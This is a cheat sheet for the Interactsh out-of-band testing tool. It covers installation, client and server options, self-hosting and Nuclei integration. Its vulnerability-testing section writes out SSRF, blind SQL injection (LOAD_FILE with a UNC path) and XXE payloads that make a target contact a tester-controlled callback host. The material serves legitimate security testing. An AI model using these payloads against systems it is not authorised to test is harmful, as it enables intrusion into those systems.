Interactsh OOB Interaction Gathering Cheat Sheet

Overview

Interactsh is an open-source tool developed by Project Discovery for detecting out-of-band (OOB) interactions. It's designed to identify vulnerabilities that cause external interactions, such as Server-Side Request Forgery (SSRF), Blind SQL Injection, XML External Entity (XXE) Injection, and other vulnerabilities that may not be immediately visible through traditional testing methods.

What makes Interactsh unique is its comprehensive approach to OOB testing. Unlike other tools that focus on specific protocols, Interactsh can detect interactions across multiple protocols, including DNS, HTTP(S), SMTP(S), and LDAP. It consists of both a server component that captures and logs these interactions and a client component that generates unique testing URLs and monitors for any interactions with those URLs.

Interactsh is widely used in security testing to identify vulnerabilities that might otherwise go undetected. It's particularly valuable for bug bounty hunters, penetration testers, and security researchers who need to verify the existence of vulnerabilities that rely on external interactions. The tool is also integrated with Nuclei, another Project Discovery tool, enabling automated vulnerability scanning with OOB detection capabilities.

Installation

Client Installation

Using Go

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

# Verify installation
interactsh-client -version

Using Docker

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh client using Docker
docker run -it projectdiscovery/interactsh:latest client -h

Using Homebrew (macOS)

# Install using Homebrew
brew install interactsh-client

# Verify installation
interactsh-client -version

Using PDTM (Project Discovery Tools Manager)

# Install PDTM first if not already installed
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest

# Install Interactsh client using PDTM
pdtm -i interactsh-client

# Verify installation
interactsh-client -version

Server Installation (Self-Hosted)

Using Go

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest

# Verify installation
interactsh-server -version

Using Docker

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh server using Docker
docker run -it projectdiscovery/interactsh:latest server -h

Basic Usage

Client Usage

# Start the client with default settings
interactsh-client

# Start the client with verbose output
interactsh-client -v

# Start the client with a specific server
interactsh-client -server your-interactsh-server.com

Server Usage (Self-Hosted)

# Start the server with default settings
interactsh-server

# Start the server with a specific domain
interactsh-server -domain your-domain.com

# Start the server with verbose output
interactsh-server -v

Output Options

# Save interactions to a file
interactsh-client -o interactions.log

# Output in JSON format
interactsh-client -json -o interactions.json

# Silent mode (no banner)
interactsh-client -silent

Client Configuration

Basic Configuration

# Set polling interval (seconds)
interactsh-client -poll-interval 5

# Set interaction timeout (seconds)
interactsh-client -interaction-timeout 60

# Enable persistent session
interactsh-client -persistent-session

# Use a specific correlation ID
interactsh-client -correlation-id your-correlation-id

Authentication

# Use token for authentication
interactsh-client -token your-auth-token

# Use a specific server with token
interactsh-client -server your-interactsh-server.com -token your-auth-token

Filtering

# Filter interactions by type
interactsh-client -filter-type dns,http

# Filter interactions by IP
interactsh-client -filter-ip 1.2.3.4

# Filter interactions by content
interactsh-client -filter-content "admin"

Server Configuration (Self-Hosted)

Domain Configuration

# Set domain for the server
interactsh-server -domain your-domain.com

# Set wildcard domain
interactsh-server -domain your-domain.com -wildcard

# Set IP address to listen on
interactsh-server -ip 1.2.3.4

Certificate Configuration

# Use Let's Encrypt for certificates
interactsh-server -domain your-domain.com -letsencrypt

# Use custom certificates
interactsh-server -domain your-domain.com -cert cert.pem -key key.pem

Authentication Configuration

# Enable authentication
interactsh-server -auth

# Set token for authentication
interactsh-server -auth-token your-auth-token

# Set token file for authentication
interactsh-server -auth-token-file tokens.txt

Advanced Usage

Client Advanced Features

# Generate a specific number of URLs
interactsh-client -n 5

# Generate URLs with a specific payload
interactsh-client -payload-template "\\\\{\\\\{random\\\\}\\\\}.your-domain.com"

# Enable DNS callback only
interactsh-client -dns-only

# Enable HTTP callback only
interactsh-client -http-only

# Enable SMTP callback only
interactsh-client -smtp-only

Server Advanced Features

# Enable specific services
interactsh-server -dns -http -smtp -ldap

# Disable specific services
interactsh-server -no-dns -no-http -no-smtp -no-ldap

# Set custom ports
interactsh-server -dns-port 53 -http-port 80 -https-port 443 -smtp-port 25 -smtps-port 587 -ldap-port 389

# Enable metrics
interactsh-server -metrics

Payload Generation

# Generate a URL for testing
interactsh-client -generate-url

# Generate multiple URLs
interactsh-client -generate-url -n 5

# Generate URL with specific server
interactsh-client -generate-url -server your-interactsh-server.com

Integration with Other Tools

Integration with Nuclei

# Use Interactsh with Nuclei
nuclei -u https://example.com -t nuclei-templates/

# Use a specific Interactsh server with Nuclei
nuclei -u https://example.com -t nuclei-templates/ -interactsh-server your-interactsh-server.com

# Disable Interactsh in Nuclei
nuclei -u https://example.com -t nuclei-templates/ -no-interactsh

Integration with Notify

# Send Interactsh interactions to Discord
interactsh-client|notify -provider discord

# Send filtered interactions to Slack
interactsh-client -filter-type http|notify -provider slack

Integration with Custom Scripts

# Use Interactsh in a bash script
#!/bin/bash
URL=$(interactsh-client -generate-url)
curl -s "https://example.com/test?url=$URL"
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing Vulnerabilities

Testing SSRF

# Generate a URL for SSRF testing
URL=$(interactsh-client -generate-url)

# Use the URL in a potential SSRF vulnerability
curl -s "https://example.com/fetch?url=http://$URL/test"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing Blind SQL Injection

# Generate a URL for Blind SQL Injection testing
URL=$(interactsh-client -generate-url)

# Use the URL in a SQL query
curl -s "https://example.com/search?id=1' UNION SELECT LOAD_FILE(CONCAT('\\\\',$URL,'\\share'))"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing XXE Injection

# Generate a URL for XXE testing
URL=$(interactsh-client -generate-url)

# Create an XML payload with XXE
cat > xxe.xml << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://$URL/xxe">
]>
<foo>&xxe;</foo>
EOF

# Send the XML payload
curl -s -X POST -d @xxe.xml -H "Content-Type: application/xml" https://example.com/api

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Troubleshooting

Common Issues

1. No Interactions Detected ```bash # Increase polling interval interactsh-client -poll-interval 10

# Increase interaction timeout interactsh-client -interaction-timeout 120

# Check if the target is behind a firewall # Try using different protocols (DNS, HTTP, SMTP) ```

1. Connection Issues ```bash # Check if the server is reachable ping your-interactsh-server.com

# Try a different server interactsh-client -server oast.pro

# Check if your network allows outbound connections ```

1. Authentication Issues ```bash # Verify token interactsh-client -server your-interactsh-server.com -token your-auth-token -v

# Check if the server requires authentication ```

1. Server Setup Issues ```bash # Check DNS configuration dig ns your-domain.com

# Verify that your domain's nameservers point to your server # Ensure that your server has the necessary ports open ```

Debugging

# Enable verbose mode for client
interactsh-client -v

# Enable debug mode for client
interactsh-client -debug

# Enable verbose mode for server
interactsh-server -v

# Enable debug mode for server
interactsh-server -debug

Self-Hosting Guide

DNS Configuration

To self-host Interactsh, you need to configure your domain's DNS settings:

1. Register a domain (e.g., your-domain.com)
2. Set up NS records for your domain to point to your server: your-domain.com. IN NS ns1.your-domain.com. your-domain.com. IN NS ns2.your-domain.com.
3. Set up A records for your nameservers: ns1.your-domain.com. IN A your-server-ip ns2.your-domain.com. IN A your-server-ip

Server Setup

# Start the server with your domain
interactsh-server -domain your-domain.com

# Enable Let's Encrypt for HTTPS
interactsh-server -domain your-domain.com -letsencrypt

# Enable authentication
interactsh-server -domain your-domain.com -auth -auth-token your-auth-token

Docker Deployment

# Create a docker-compose.yml file
cat > docker-compose.yml << EOF
version: '3'
services:
  interactsh-server:
    image: projectdiscovery/interactsh:latest
    command: server -domain your-domain.com -letsencrypt -auth -auth-token your-auth-token
    ports:
      - "53:53/udp"
      - "80:80"
      - "443:443"
      - "25:25"
      - "587:587"
      - "389:389"
    restart: always
EOF

# Start the server
docker-compose up -d

Configuration

Client Configuration File

Interactsh client uses a configuration file located at $HOME/.config/interactsh-client/config.yaml. You can customize various settings in this file:

# Example configuration file
server: oast.pro
token: your-auth-token
poll-interval: 5
interaction-timeout: 60
filter-type: dns,http

Server Configuration File

Interactsh server uses a configuration file located at $HOME/.config/interactsh-server/config.yaml. You can customize various settings in this file:

# Example configuration file
domain: your-domain.com
ip: 1.2.3.4
letsencrypt: true
auth: true
auth-token: your-auth-token

Environment Variables

# Set Interactsh client configuration via environment variables
export INTERACTSH_SERVER=oast.pro
export INTERACTSH_TOKEN=your-auth-token
export INTERACTSH_POLL_INTERVAL=5
export INTERACTSH_INTERACTION_TIMEOUT=60

# Set Interactsh server configuration via environment variables
export INTERACTSH_DOMAIN=your-domain.com
export INTERACTSH_IP=1.2.3.4
export INTERACTSH_LETSENCRYPT=true
export INTERACTSH_AUTH=true
export INTERACTSH_AUTH_TOKEN=your-auth-token

Reference

Client Command Line Options

Flag	Description
-server	Interactsh server to use
-token	Authentication token for the server
-n	Number of URLs to generate
-o, -output	File to write output to
-json	Write output in JSON format
-v, -verbose	Show verbose output
-debug	Show debug information
-poll-interval	Polling interval in seconds
-interaction-timeout	Interaction timeout in seconds
-persistent-session	Enable persistent session
-correlation-id	Correlation ID for the session
-filter-type	Filter interactions by type (dns, http, smtp, ldap)
-filter-ip	Filter interactions by IP
-filter-content	Filter interactions by content
-generate-url	Generate URL for testing
-dns-only	Enable DNS callback only
-http-only	Enable HTTP callback only
-smtp-only	Enable SMTP callback only
-ldap-only	Enable LDAP callback only
-payload-template	Custom payload template
-version	Show Interactsh client version

Server Command Line Options

Flag	Description
-domain	Domain to use for the server
-ip	IP address to listen on
-wildcard	Enable wildcard domain
-letsencrypt	Use Let's Encrypt for certificates
-cert	Path to certificate file
-key	Path to key file
-auth	Enable authentication
-auth-token	Authentication token
-auth-token-file	File containing authentication tokens
-dns	Enable DNS service
-http	Enable HTTP service
-smtp	Enable SMTP service
-ldap	Enable LDAP service
-no-dns	Disable DNS service
-no-http	Disable HTTP service
-no-smtp	Disable SMTP service
-no-ldap	Disable LDAP service
-dns-port	Port for DNS service
-http-port	Port for HTTP service
-https-port	Port for HTTPS service
-smtp-port	Port for SMTP service
-smtps-port	Port for SMTPS service
-ldap-port	Port for LDAP service
-metrics	Enable metrics
-v, -verbose	Show verbose output
-debug	Show debug information
-version	Show Interactsh server version

Supported Interaction Types

Type	Description
dns	DNS interactions
http	HTTP/HTTPS interactions
smtp	SMTP/SMTPS interactions
ldap	LDAP interactions

Resources

• Official Documentation
• GitHub Repository
• Project Discovery Discord

---

This cheat sheet provides a comprehensive reference for using Interactsh, from basic client and server usage to advanced configuration and integration with other tools. For the most up-to-date information, always refer to the official documentation.